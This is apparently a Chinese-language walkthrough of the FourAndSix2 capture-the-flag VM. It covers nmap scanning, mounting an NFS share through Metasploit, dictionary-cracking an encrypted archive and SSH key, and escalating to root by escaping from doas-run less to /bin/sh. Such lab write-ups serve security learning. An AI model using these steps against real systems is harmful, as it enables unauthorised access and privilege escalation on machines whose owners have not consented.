FourAndSix2渗透实战

主机发现和信息收集

arp-scan –l

arp-scan

nmap -sS -A -p- -n 192.168.8.128

nmap

Nmap扫出来，居然没有开80端口

telnet 192.168.8.128 80

telnet

省下了web渗透

nfs挂载

发现了在111端口的rpcbind和2049端口的nfs服务开启
查阅资料发现：

rpcbind服务是一个RPC服务，主要是在nfs共享时候负责通知客户端，服务器的nfs端口号是什么的。简单理解rpc就是一个中介服务。

很显然，靶机存在共享目录等着我们去挂载。
在msf中

search nfs

search nfs

use auxiliary/scanner/nfs/nfsmount

nfsmount

配置好后，直接 exploit
发现可挂载目录 /home/user/storage

发现可挂载目录

那就上挂载目录看看有什么东西

nfspysh -o server=192.168.8.128:/home/user/storage

发现是在user用户的目录下挂载
其中发现一个备份压缩文件backup.7z

help    查看命令
lpwd   查看本地挂载的路径
get      下载文件到本地

help

进行解压

7z e backup.7z

image.png

竟然加密了
可以看到压缩包内部的文件，有图片还有rsa，难道是登录ssh的密钥

文件

爆破解密

跑字典爆破
密码：chocolate
成功解压：

解压

HelloKitty，浓浓的少女风
id_rsa和id_rsa.pub这就是上学期课上讲过的私钥和公钥吧
参考了rsa的讲解 https://blog.csdn.net/diyxiaoshitou/article/details/52471097
可以用私钥登录靶机，因为之前挂载目录看到是在user用户下的，账号尝试用user

ssh -i id_rsa [email protected]

ssh

rsa私钥也加密了，需要破解私钥的密码：
参考 https://www.freebuf.com/column/191782.html 大神写的shell脚本

密码：1-8

login

登录成功

cd root

提权

在doas.conf中发现uses能够以root权限免密码执行less /var/log/authlog
doas是BSD系列系统下的权限管理工具，类似于Debian系列下的sudo命令

doas

doas /usr/bin/less /var/log/authlog

然后直接按v，可进入编辑模式
之后执行vi系统操作命令，即Esc ：

!/bin/sh

此时便会提升到root权限

提权

直接全局搜flag：

find / -name "*flag*" 2>/dev/null

find flag

cat flag.txt

cat flag

总结：

1、本次实战，思路还是比较清晰的，在没有WEB渗透的情况下，很自然要想到利用msf搜索相应服务版本的利用漏洞，以及22端口ssh的爆破和登录。
2、找到靶机挂载的目录后，down下压缩文件进行爆破解压后看到id_rsa,结合上学期所学的内容要想到用私钥登录ssh
3、在提权过程中，uname -a查看靶机的系统信息，发现是BSD，之前没做过这类的提权，而且这类的漏洞也比较少，只能仿效SUID和sudoers这类的命令执行提取，所以查看靶机目录下的可读文件，发现了doas.conf(doas是BSD系列系统下的权限管理工具)进行!/bin/sh提权。

FourAndSix2 靶机百度云下载
链接：https://pan.baidu.com/s/1v61lULA5JYIFD46Avi8I4Q
提取码：9jxa